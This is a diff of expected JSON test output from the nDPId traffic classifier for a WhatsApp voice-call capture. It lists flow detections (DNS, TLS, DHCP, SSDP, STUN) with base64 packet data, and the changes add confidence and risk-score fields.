-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1561455707435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1561455707435,"pkt":"xiwDYGpkkLkxKPrKCABFAAA+06QAAP8RYqzAqAIMwKgCAeyFADUAKgBWfx8BAAABAAAAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAQ=="}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1561455707470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"ts_msec":1561455707470,"pkt":"kLkxKPrKxiwDYGpkCABFAABnIjoAAEAR0u7AqAIBwKgCDAA17IUAUyY\/fx+BgAABAAIAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAcAMAAUAAQAACz4ADQZtbXgtZHMDY2RuwBDALgABAAEAAAA+AASd8BQ0"}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1561455707474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1561455707474,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd\/AqAIMnfAUNMVIAbt68MpNAAAAALDC\/\/823wAAAgQFtAEDAwcBAQgKNM5JcwAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1561455707511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1561455707511,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uOd8BQ0wKgCDAG7xUi7sKeEevDKTqASbHBlBQAAAgQFeAQCCAq1oF6CNM5JcwEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1561455709888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"ts_msec":1561455709888,"pkt":"AQBeAAD7kLkxKPrKCABFAABNP9UAAP8R2BrAqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1561455709890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"ts_msec":1561455709890,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1561455709984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1561455709984,"pkt":"AQBef\/\/6kLkxKPrKCABFAACggMsAAAIRhNPAqAIM7\/\/\/+vzMB2wAjOY9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1561455713015,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1561455713015,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChffAAAAIRh63AqAIM7\/\/\/+vzMB2wAjYZETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1561455721320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1561455721320,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqQAAP8RHAEAAAAA\/\/\/\/\/wBEAEMBNNuDAQEGAH5K8tcAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
+00728{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1561455722541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1561455722541,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqUAAP8RHAAAAAAA\/\/\/\/\/wBEAEMBNNuCAQEGAH5K8tcAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1561455724934,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1561455724934,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqYAAP8RG\/8AAAAA\/\/\/\/\/wBEAEMBNNuAAQEGAH5K8tcAAwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455726442,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455726442,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIUlcAAEARof3AqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1561455730495,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455730495,"pkt":"kLkxKPrKxiwDYGpkCABFAABI7nAAADERRFFb\/DgzwKgCDH\/A3AgANOnLAAEAGCESpEJZi1FU1SmRVkxGZgQACAAUYCmYSN+rkyNYVIx9I16CdotJWKc="}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1561455731073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455731073,"pkt":"kLkxKPrKxiwDYGpkCABFAABIAlEAADERMHFb\/DgzwKgCDH\/A3AgANGApAAEAGCESpELobM0y9AHrYlN0+hgACAAU\/c20Lcr5wjE5JYKvJct9qbua6og="}
 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455731356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"ts_msec":1561455731356,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxjdoAAEARZVHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1561455731665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455731665,"pkt":"xiwDYGpkkLkxKPrKCABFAABId7IAAEAR8MLAqAIMATxOQNwI+xoANL93AAEAGCESpEJNNg9OA5IbZKhKGmoACAAUkUJIDnID0ka3i4LpQfhGRUa3K\/w="}
